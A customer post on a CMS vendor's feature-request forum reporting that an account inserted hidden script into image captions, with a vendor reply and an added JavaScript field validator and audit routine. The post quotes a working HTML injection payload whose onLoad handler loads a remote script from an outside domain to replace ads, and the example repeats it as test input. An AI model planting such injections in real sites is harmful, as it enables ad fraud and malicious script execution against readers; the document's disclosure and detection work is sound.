We recently discovered that one of our user accounts has been inserting the following code in selected stories:
</span><img id="imgl" src="//googledfp.com/flag.svg.png" onLoad="var hh=document.getElementsByTagName('head')[0],ss=document.createElement('script');ss.async=!0,ss.type='text/javascript',ss.id='CMS',ss.src='//googledfp.com/hf.js?i='+Math.floor(99999*Math.random()+1),hh.appendChild(ss);" style="display:none" /><span>
We found the code inserted in the Caption Field of the article's assigned Basic Image in Composer's featured media tab.
Once the story with the inserted code is published and the page is opened in a browser, the code executes and accesses a .js file located on an external domain, which in turn runs code that replaces our adUnits with fraudulent ads.
Arc should include a security setting to allow customers to enforce strict validation on Composer's fields, in order to prevent such code from being inserted where only text is expected.
I recently brought this issue up in the most recent Product Roadmap Update, and I got this comment from Mike Holland:
"So, we tend to treat employees who have permissions to click “publish” as “trusted”. In the past we’ve added and removed scrubbing capabilities and angered one side (please block everything) or the other (please allow us to do custom features).
That being said, I can see why your case is dangerous. We’ll take a look at your request and see if there are options for giving you the ability to configure the constraints, but it’s not in the Q2/3 roadmap right now."
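Added example, not part of the original post and not Arc XP's code: a strict text-only field validator of the kind the request asks for, plus an audit that flags already-published stories whose text fields fail it, run against the caption payload quoted above. The field names (headline, caption, credit) and the length limit are assumptions made for illustration.

```javascript
// Added example (not Arc XP's or the poster's code): strict validation for a
// CMS field that should hold only plain text, plus an audit over a story's
// text fields. Field names and the default length limit are assumptions.

// Constructed sample input: the caption payload quoted in the post, shortened.
// Nothing here fetches the external script; the string is only inspected.
const INJECTED_CAPTION =
  '</span><img id="imgl" src="//googledfp.com/flag.svg.png" ' +
  "onLoad=\"var ss=document.createElement('script');ss.src='//googledfp.com/hf.js';\" " +
  'style="display:none" /><span>';

// Markers of markup or active content in a text-only field. Checked in order;
// the first hit names the reason so rejections can be logged and reviewed.
const MARKUP_PATTERNS = [
  { reason: 'html-tag', re: /<\/?[a-z][^>]*>/i },            // <img ...>, </span>
  { reason: 'event-handler', re: /\bon[a-z]+\s*=/i },        // onLoad=, onerror=
  { reason: 'script-url', re: /\b(?:javascript|vbscript)\s*:/i },
];

// Validate one field value. Returns { ok: true } or { ok: false, reason, sample }.
// Reject rather than scrub: the editor sees why the save failed, and no
// heuristic rewrite of their content is needed.
function validatePlainTextField(value, maxLength = 1000) {
  if (typeof value !== 'string') return { ok: false, reason: 'not-a-string', sample: '' };
  if (value.length > maxLength) return { ok: false, reason: 'too-long', sample: '' };
  const normalized = value.replace(/\u0000/g, ''); // stray NULs can split tokens in some parsers
  for (const { reason, re } of MARKUP_PATTERNS) {
    const m = normalized.match(re);
    if (m) return { ok: false, reason, sample: m[0].slice(0, 40) };
  }
  return { ok: true };
}

// Output-side defence in depth: a stored caption must still be HTML-escaped
// when rendered, so anything that slips past the input check shows as text.
function escapeForHtml(value) {
  return value.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Detection: audit the text-only fields of an existing story record and return
// the names of the fields that fail validation.
function auditStoryTextFields(story, fieldNames = ['headline', 'caption', 'credit']) {
  return fieldNames.filter((name) => name in story && !validatePlainTextField(story[name]).ok);
}

// Stand-alone run over a constructed story record.
const story = { headline: 'Council approves budget', caption: INJECTED_CAPTION, credit: 'Staff photo' };
console.log(auditStoryTextFields(story));                    // [ 'caption' ]
console.log(validatePlainTextField(INJECTED_CAPTION).reason); // html-tag
```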
Hi there! We'll consider it in the future as we make continual improvements to Composer 2.0. Thank you for submitting this idea!